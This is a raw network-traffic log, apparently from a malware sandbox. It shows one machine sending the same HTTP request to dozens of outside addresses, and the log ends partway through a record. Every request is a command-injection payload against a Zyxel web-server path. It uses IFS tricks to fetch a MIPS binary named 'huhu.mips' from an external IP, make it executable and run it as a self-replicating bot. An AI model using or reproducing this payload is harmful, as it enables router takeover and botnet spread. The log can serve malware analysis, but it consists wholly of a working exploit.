                                              Jan 29, 2024 07:03:57.152523041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6151192.168.2.144720040.5.93.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152559042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6152192.168.2.1437878192.120.26.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152601957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6153192.168.2.145496452.213.202.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152637005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6154192.168.2.144179474.128.206.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152679920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6155192.168.2.1436778220.99.217.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152734041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6156192.168.2.1440216219.32.31.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152755976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6157192.168.2.144951696.29.166.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152795076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6158192.168.2.1444226136.223.232.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152826071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6159192.168.2.1445348175.63.240.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152877092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6160192.168.2.145978896.173.146.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152899981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6161192.168.2.1456818131.144.35.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152935982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6162192.168.2.1449272194.7.1.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.152983904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6163192.168.2.145760241.216.88.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153012991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6164192.168.2.144704687.4.47.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153048038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6165192.168.2.1454418113.62.28.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153085947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6166192.168.2.145162083.253.12.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153136015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6167192.168.2.1432834149.232.132.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153172016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6168192.168.2.1441602104.53.211.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153203011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6169192.168.2.145630445.179.173.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153256893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6170192.168.2.144459699.174.23.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153279066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6171192.168.2.14467284.79.119.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153328896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6172192.168.2.1460766194.48.65.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153346062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6173192.168.2.1444948140.233.211.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153374910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6174192.168.2.1444722201.75.221.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153425932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6175192.168.2.1435740135.169.10.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153469086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6176192.168.2.1435224174.137.54.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153518915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6177192.168.2.1449038116.37.135.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153546095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6178192.168.2.1456834192.23.170.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153595924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6179192.168.2.144158689.23.32.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153623104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6180192.168.2.1439308144.67.26.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153655052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6181192.168.2.145642660.225.193.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153685093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6182192.168.2.1451300218.33.74.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153707981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6183192.168.2.1453796102.157.161.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153748035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6184192.168.2.1449254183.115.51.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153776884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6185192.168.2.1448110182.24.174.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153842926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6186192.168.2.145435660.255.21.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153875113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6187192.168.2.1439054146.184.15.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153913975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6188192.168.2.1434794157.5.48.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153945923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6189192.168.2.144007453.223.33.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.153970957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6190192.168.2.1449838175.181.50.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154014111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6191192.168.2.1445540223.93.78.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154046059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6192192.168.2.144444635.149.207.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154099941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6193192.168.2.146004284.120.145.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154134035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6194192.168.2.1457674169.82.64.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154165030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6195192.168.2.1448250182.117.121.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154198885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6196192.168.2.14390368.98.170.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154228926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6197192.168.2.143842442.42.82.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154268026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6198192.168.2.1442140102.142.234.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154309034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6199192.168.2.1459224122.243.233.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154371977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6200192.168.2.144579412.44.23.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154405117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6201192.168.2.1446540176.186.216.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154428005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6202192.168.2.143632051.46.245.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154476881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6203192.168.2.1437730219.215.171.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154524088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6204192.168.2.1443148170.183.151.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154556990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6205192.168.2.145925251.152.226.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154587984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6206192.168.2.145349291.70.215.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154633999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6207192.168.2.1439066183.125.144.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154659986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6208192.168.2.143943237.161.237.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154699087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6209192.168.2.145536659.156.117.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154736042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6210192.168.2.1438320222.1.165.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154786110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6211192.168.2.1437764145.14.130.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154808044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6212192.168.2.1446250135.99.8.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154861927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6213192.168.2.1444490181.175.81.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154896975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6214192.168.2.143474459.55.161.193443
                                              TimestampBytes transferredDirectionData
